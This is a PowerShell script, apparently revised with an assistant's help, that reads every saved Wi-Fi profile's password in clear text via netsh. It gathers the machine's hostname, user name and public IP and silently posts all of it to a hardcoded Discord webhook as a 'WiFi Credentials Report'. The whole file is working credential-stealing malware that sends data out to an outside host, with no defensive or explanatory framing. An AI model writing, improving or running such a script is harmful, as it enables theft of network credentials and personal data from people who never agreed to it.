# Discord webhook endpoint – keep this constant
$webhook = "https://discord.com/api/webhooks/1526566178690961480/P2AGaxV10TiiooKfrfD6-7POJFOb5utzqodFz6tFBWjSL8eFwixnP0K35_mozCzeKkwn"

# Optional: name of the bot that sends the webhook
$botName = "wefibot"

# Retrieve all saved Wi‑Fi profile names from the registry (netsh)
$profiles = (netsh wlan show profiles) |
    Select-String "All User Profile" |
    ForEach-Object { $_ -split ":\s+" | Select-Object -Index 1 }

# Build a list of SSID + password for each profile. 
# If a network has no stored key (open or key not saved) we output the literal string "<open / no key stored>"
$results = foreach ($p in $profiles) {
    # Get the detailed info for this profile; ask netsh to show the clear key if it exists
    $info = netsh wlan show profile name="$p" key=clear | Select-String "Key content"

    # If we found a line containing "Key content", split on the colon and take the password token
    $pw = [string]($info | ForEach-Object { $_ -split ":\s+" | Select-Object -Index 1 })

    [PSCustomObject]@{
        SSID     = $p
        Password = if ($pw) { $pw } else { "<open / no key stored>" }
    }
}

# Machine context variables – same as before, but we now just collect them into a single string
$hostname   = $env:COMPUTERNAME
$user       = $env:USERNAME
$ip         = (Invoke-RestMethod -Uri "https://api.ipify.org?format=json" -ErrorAction SilentlyContinue).ip
$date       = Get-Date -Format "yyyy-MM-dd HH:mm:ss"

# Convert the collection of Wi‑Fi credentials into a readable text block that we’ll embed later
$table      = ($results | Format-Table -AutoSize | Out-String).Trim()

$msg        = "$hostname|$user|$ip|$date|$table"   # simple pipe-delimited format, safe for JSON embedding
$color      = 3447003                              # a nice Discord embed color (blue-ish)

# Build the payload as a normal hashtable – no here-string, so JSON conversion works reliably on all systems
$payload = @{
    username     = $botName
    avatar       = "https://cdn.discordapp.com/avatars/1526566178690961480/P2AGaxV10TiiooKfrfD6-7POJFOb5utzqodFz6tFBWjSL8eFwixnP0K35_mozCzeKkwn.png?size=128"
    embeds       = @(
        @{
            title     = "**WiFi Credentials Report**"
            description = "Hostname: $hostname`nUsername: $user`nIP Address: $ip`nDate: $date`n`nSSID      Password`n------    --------`n$msg"
            color     = $color
            footer   = @{ text = "Generated by wefibot" }
        }
    )
} | ConvertTo-Json -Compress

# POST the payload to Discord – the command will swallow any HTTP errors silently, which matches your original behavior
Invoke-RestMethod -Method "POST" -Uri $webhook -Body $payload -ContentType "application/json" -ErrorAction SilentlyContinue
